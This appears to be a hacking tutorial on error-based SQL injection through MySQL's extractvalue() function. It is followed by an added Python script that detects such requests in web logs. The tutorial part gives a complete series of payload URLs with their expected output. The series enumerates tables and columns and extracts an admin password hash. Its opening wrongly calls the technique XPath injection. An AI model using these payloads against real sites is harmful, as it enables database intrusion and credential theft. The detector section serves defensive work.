If a website is vulnerable to XPath injection, an attacker can inject XPath elements into a query that uses this language. This happens when the website uses client-supplied information to construct an XPath query to get XML data.
When To Use It?
Let us assume we have found a vulnerable site: after ORDER BY we get 7 columns, but when we try to *actually* inject using UNION SELECT, it says something like "The used SELECT statements have a different number of columns".
Let the vulnerable website be www.examplevulnweb.com/ex.php?s= , where ex.php?s= is vulnerable. We'll use extractvalue(). ExtractValue() is a function in MySQL that extracts a value from an XML string using XPath notation.
The function takes input in the following form:
ExtractValue(xml_frag, xpath_expr)
If the XPath query is syntactically incorrect, we are presented with an error message:
XPATH syntax error: 'QueryHere'
So we can get the version using this query:
http://examplevulnweb.com/ex.php?s=1 and extractvalue(rand(),concat(0x3a,version()))--
We'll get something like this:
XPATH syntax error: DB Version
We'll have to get the tables one by one, like:
http://examplevulnweb.com/ex.php?s=1 and extractvalue(rand(),concat(0x7e,(select concat(0x20,table_name) from information_schema.tables limit 0,1)))--
The result would be something like:
XPATH syntax error: ~ admin
Then we'll get the columns:
http://examplevulnweb.com/ex.php?s=1 and extractvalue(rand(),concat(0x7e,(select concat(0x20,column_name) from information_schema.columns where table_name=0x61646d696e limit 0,1)))--
Result:
XPATH syntax error: ~ password
And finally we'll grab the data:
http://examplevulnweb.com/ex.php?s=1 and extractvalue(rand(),concat(0x7e,(select password from admin limit 0,1)))--
and the output would be:
XPATH syntax error: ~ 21232f297a57a5a743894a0e4a801fc3
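The requests above as they look from the defender's side: an added example, not part of the original post, that scans request URLs for the extractvalue() pattern (and its sibling updatexml(), which raises the same XPATH syntax error) and decodes the 0x literals so an analyst can see which table is being targeted. The sample requests are constructed from the queries in this post, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# MySQL XML functions whose XPATH syntax error echoes the injected expression.
XPATH_FUNCS = re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)
SCHEMA_REF = re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)

def decode_hex_literals(sql):
    """Decode 0x.. string literals, e.g. 0x61646d696e -> 'admin'."""
    decoded = []
    for match in HEX_LITERAL.finditer(sql):
        text = bytes.fromhex(match.group(1)).decode("latin-1")
        if text.isprintable():
            decoded.append(text)
    return decoded

def inspect_request(url):
    """Return triage details for one request URL, or None if it looks clean."""
    query = unquote_plus(urlsplit(url).query)
    # Inline comments are often used in place of spaces; normalise both.
    query = re.sub(r"\s+", " ", re.sub(r"/\*.*?\*/", " ", query))
    func = XPATH_FUNCS.search(query)
    if not func:
        return None
    schema = SCHEMA_REF.search(query)
    return {
        "function": func.group(1).lower(),
        "enumerates": schema.group(1).lower() if schema else None,
        "literals": decode_hex_literals(query),
    }

# Constructed sample requests (assumed access-log format: path plus query).
SAMPLE_REQUESTS = [
    "/ex.php?s=1",
    "/ex.php?s=1%20and%20extractvalue(rand(),concat(0x3a,version()))--",
    "/ex.php?s=1+and+extractvalue(rand(),concat(0x7e,(select+concat(0x20,"
    "column_name)+from+information_schema.columns+where+"
    "table_name=0x61646d696e+limit+0,1)))--",
    "/search.php?q=how+to+use+extractvalue+in+mysql",  # benign mention
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(request[:60], "->", inspect_request(request))
```

The last sample shows why the pattern requires an opening parenthesis: a search for the word "extractvalue" alone is not flagged.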